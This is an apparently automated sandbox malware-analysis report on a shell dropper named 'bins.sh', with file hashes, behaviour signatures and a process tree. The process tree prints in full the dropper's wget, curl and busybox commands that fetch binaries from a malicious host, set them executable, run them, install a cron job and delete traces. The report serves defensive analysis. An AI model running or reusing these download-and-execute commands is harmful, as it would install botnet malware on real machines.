Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    05/12/2024, 07:52

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    4ec351f49dc5766e37b9f2ca107ea79f

  • SHA1

    1e9e758cc6d6441d23748b0a346dcfc1df30e105

  • SHA256

    c4ffcebc0d441088029827d34c8dea73194328becf29e50825d908b5b2f5d661

  • SHA512

    5371efb6490ae01946e723c37b09df490d54cc86f0b773d9b3121e608345aca8f92c18f149031f0380cca92eb021bf656abe984568c20fbe7a135211af49e60c

  • SSDEEP

    192:8cfVNYb3Tjdl4z596v3m8MJeyct+8CB596v3w8MJeyhlI0VNYb3TS:8cydl1t+8ulIm

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 5 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 16 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:652
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:654
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • System Network Configuration Discovery
          PID:660
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:666
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • System Network Configuration Discovery
          PID:683
        • /bin/chmod
          chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • File and Directory Permissions Modification
          PID:684
        • /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB
          ./zZM090BtLw96clc18K3325Bi3InWJUorwB
          2⤵
          • Executes dropped EXE
          • Renames itself
          • Reads runtime system information
          PID:685
          • /bin/sh
            sh -c "crontab -l"
            3⤵
              PID:687
              • /usr/bin/crontab
                crontab -l
                4⤵
                  PID:689
              • /bin/sh
                sh -c "crontab -"
                3⤵
                  PID:690
                  • /usr/bin/crontab
                    crontab -
                    4⤵
                    • Creates/modifies Cron job
                    PID:691
              • /bin/rm
                rm zZM090BtLw96clc18K3325Bi3InWJUorwB
                2⤵
                  PID:694
                • /usr/bin/wget
                  wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
                  2⤵
                  • System Network Configuration Discovery
                  PID:697
                • /usr/bin/curl
                  curl -O http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
                  2⤵
                  • System Network Configuration Discovery
                  PID:698
                • /bin/busybox
                  /bin/busybox wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
                  2⤵
                  • System Network Configuration Discovery
                  PID:699
                • /bin/chmod
                  chmod 777 ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
                  2⤵
                  • File and Directory Permissions Modification
                  PID:700
                • /tmp/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
                  ./ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
                  2⤵
                    PID:701
                  • /bin/rm
                    rm ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG
                    2⤵
                      PID:702
                    • /usr/bin/wget
                      wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
                      2⤵
                      • System Network Configuration Discovery
                      PID:703
                    • /usr/bin/curl
                      curl -O http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
                      2⤵
                      • System Network Configuration Discovery
                      PID:704
                    • /bin/busybox
                      /bin/busybox wget http://conn.masjesu.zip/bins/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
                      2⤵
                      • System Network Configuration Discovery
                      PID:705
                    • /bin/chmod
                      chmod 777 OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
                      2⤵
                      • File and Directory Permissions Modification
                      PID:706
                    • /tmp/OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
                      ./OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
                      2⤵
                        PID:707
                      • /bin/rm
                        rm OhFbeFlNh48rnwYnWPke5hjvy6aMpgW5c9
                        2⤵
                          PID:708
                        • /usr/bin/wget
                          wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
                          2⤵
                          • System Network Configuration Discovery
                          PID:709
                        • /usr/bin/curl
                          curl -O http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
                          2⤵
                          • System Network Configuration Discovery
                          PID:710
                        • /bin/busybox
                          /bin/busybox wget http://conn.masjesu.zip/bins/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
                          2⤵
                          • System Network Configuration Discovery
                          PID:711
                        • /bin/chmod
                          chmod 777 Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
                          2⤵
                          • File and Directory Permissions Modification
                          PID:712
                        • /tmp/Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
                          ./Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
                          2⤵
                            PID:713
                          • /bin/rm
                            rm Bu9yglR9x0Y5e2jBKPnji9UncVsXgThItX
                            2⤵
                              PID:714
                            • /usr/bin/wget
                              wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
                              2⤵
                              • System Network Configuration Discovery
                              PID:715
                            • /usr/bin/curl
                              curl -O http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
                              2⤵
                              • System Network Configuration Discovery
                              PID:716
                            • /bin/busybox
                              /bin/busybox wget http://conn.masjesu.zip/bins/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
                              2⤵
                              • System Network Configuration Discovery
                              PID:717
                            • /bin/chmod
                              chmod 777 Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
                              2⤵
                              • File and Directory Permissions Modification
                              PID:718
                            • /tmp/Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
                              ./Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
                              2⤵
                                PID:719
                              • /bin/rm
                                rm Vn4qxsEXqKf1c64htQMLQ9ZX7wNO6HrNTS
                                2⤵
                                  PID:720
                                • /usr/bin/wget
                                  wget http://conn.masjesu.zip/bins/jycs76M6vBIZ1GmDmLy0gXM9o11CS79Z9O
                                  2⤵
                                  • System Network Configuration Discovery
                                  PID:722

                              Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

                                      Filesize

                                      177KB

                                      MD5

                                      786d75a158fe731feca3880f436082c0

                                      SHA1

                                      79ea2734e43d00cdeabed5586b2c1994d02aef3e

                                      SHA256

                                      5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18

                                      SHA512

                                      7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

                                    • /var/spool/cron/crontabs/tmp.nFADI4

                                      Filesize

                                      210B

                                      MD5

                                      5e8eb0b39864e53b859bcdcaeb4dbe6a

                                      SHA1

                                      c8116483ad132a21e500bb5087c53996ed66334c

                                      SHA256

                                      6f0768d965338cb7d3061fcc41810df84bd23d8978a6e186fe996b33e6ae37e7

                                      SHA512

                                      4338d28aba1567ee8022a74e0d80020daaeea88b4d026c36fbb9e395e7e9d4a511073e94a018afe1863248585fe7f413d09ccff177f6b41c24ff829d746a0820